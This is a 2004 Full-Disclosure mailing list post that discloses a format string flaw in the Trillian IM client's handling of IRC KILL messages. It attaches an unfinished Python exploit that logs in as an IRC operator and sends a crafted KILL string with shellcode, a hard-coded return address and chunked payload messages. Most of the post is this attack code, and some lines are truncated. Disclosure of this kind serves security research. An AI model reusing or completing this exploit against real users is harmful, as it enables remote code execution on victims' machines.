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Re: [Full-Disclosure] Advisory 02/2004: Trillian remote overflows-> maybe this is off-topic, but...
- To: <randnut@hotmail.com>
- Subject: Re: [Full-Disclosure] Advisory 02/2004: Trillian remote overflows-> maybe this is off-topic, but...
- From: <andrewg@d2.net.au>
- Date: Wed, 25 Feb 2004 15:48:57 +1100 (EST)
On the subject of trillian..
Well, for what its worth, there is a format string in the parsing of KILL
messages by trillian (:. requiring you have have oper or RW access to a
clients connection).
Attached is an exploit... not complete, something I was working on and
lost interest. (http://felinemenace.org/~andrewg/split_search.py might be
useful for other irc clients exploits for large shellcodes)..
There seems to be a race involved. The shellcode basically moves around
and gets mangled lots by the display thread or something. I was thinking
that straight ascii-shellcode would be the way to go, or a modification of
split search so it didn't use various stuff like - or < etc.
There is most likely an easier way of exploiting this bug, but *shrug*
Andrew Griffiths
>> > "What is Trillian?
>> >
>> > Trillian is a skinnable, interoperable instant messaging client.
>> Grab the best IM client available on the Internet today!
>> > Trillian .74 is completely free, with no spyware and no ads.
>> Over 10 million downloads can't be wrong!"
>>"Completely free". Aha. Where is the source code and a suitable license
>> to modify and share modifications?
>>"No spyware". Aha. How can we know without the source? Well, I guess we
>> have to take their word.
> No, you're free to reverse engineer Trillian (they might sue you,
> though). Everything is "open source" if you know assembler.
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# trillian KILL format string exploit
import os, struct, socket, time, split_search
class trillian_kill_fmtstr:
def __init__(self, host="", port=6667, nick="andrewg",
operpass="feeling_like_a_freak_on_a_leash", target="andrewg__"):
self.host = host
self.port = port
self.nick = nick
self.target = target
self.operpass = operpass
self.crlf = "\r\n"
killstr = "PRIVMSG " + target + " :"
self.max_sc_len = 510 - len(killstr)
self.retaddr = 0x71a5403d
self.real_sc = "\x90" * 2000
#self.real_sc =
self.sc = "\x33\x66\x31\xc9\xeb\x0c\x66\x51\x66\x51\x64\x66\x67"
self.sc += "\x89\x21\x66\x56\xcc\xe8\xf3\xff\xcc"
if(self.real_sc.find("\r") != -1):
print "[*] \r found @ %d" % self.real_sc.find("\r")
if(self.real_sc.find("\n") != -1):
print "[*] \n found @ %d" % self.real_sc.find("\n")
# bd
set_edi = "\xbf\x41\x41\xbd\xbe\x81\xf7\x41\x41\x41\x41"
set_edi += "\x21\xfe\x87\xf7"
reset_edi = "\x21\xf7"
x = split_search.split_search(400, set_edi, reset_edi)
#self.sc = "\x90" + x.initial_scanner
self._chunks = x._chunks
def run(self):
sd = socket.socket(socket.AF_INET, socket.SOCK_STREAM, 0)
sd.connect((self.host, self.port))
sd.send("USER " + self.nick + " woohoo localhost localhost :OWNED" +
sd.send("NICK " + self.nick + self.crlf)
sd.send("OPER " + self.nick + " " + self.operpass + self.crlf)
# -2 for " :"
# need to calcuate the server buff and stuff.
pad = 4055 - len(self.target) - len(self.sc) - 2
killbuf = "KILL " + self.target + " :%%%dd" % pad
killbuf += self.sc
killbuf += struct.pack("<l", self.retaddr)
killbuf += "\xeb" + chr(250 - len(self.sc))
killbuf += self.crlf
#sd.send("PRIVMSG killtesting :my kill string is " + killbuf +
#sd.send("JOIN #fm" + self.crlf)
#buf = "PRIVMSG #fm :my target is " + self.target
#buf += ", my padding length is %d" % pad
#buf += ", my return address is 0x%08x" % self.retaddr
#buf += ", my search code len is %d" % len(self.sc)
#buf += ", and the max shellcode I can send is %d" % self.max_sc_len
#buf += self.crlf
print sd.recv(2048)
#sd.send("PRIVMSG " + self.target + " :I've got a quick question if you
don't mind?" + self.crlf)
#sd.send("PROVMSG #fm :I'm going for the kill!@!" + self.crlf)
#sd.send("PRIVMSG killtesting :asl!@!@?" + self.crlf)
for i in self._chunks:
#i += "\xff\xe4"
print "length of chunk: %d" % len(i)
if(i.find("\r") != -1):
print "[*] \r found!!!"
if(i.find("\n") != -1):
print "[*] \n found!!!"
#sd.send("PRIVMSG killtesting :" + i + self.crlf)
#sd.send("PRIVMSG killtesting :chunk" + self.crlf)
sd.send("PRIVMSG " + self.target + " :" + i + self.crlf)
print sd.recv(2048)
if __name__ == '__main__':
x = trillian_kill_fmtstr()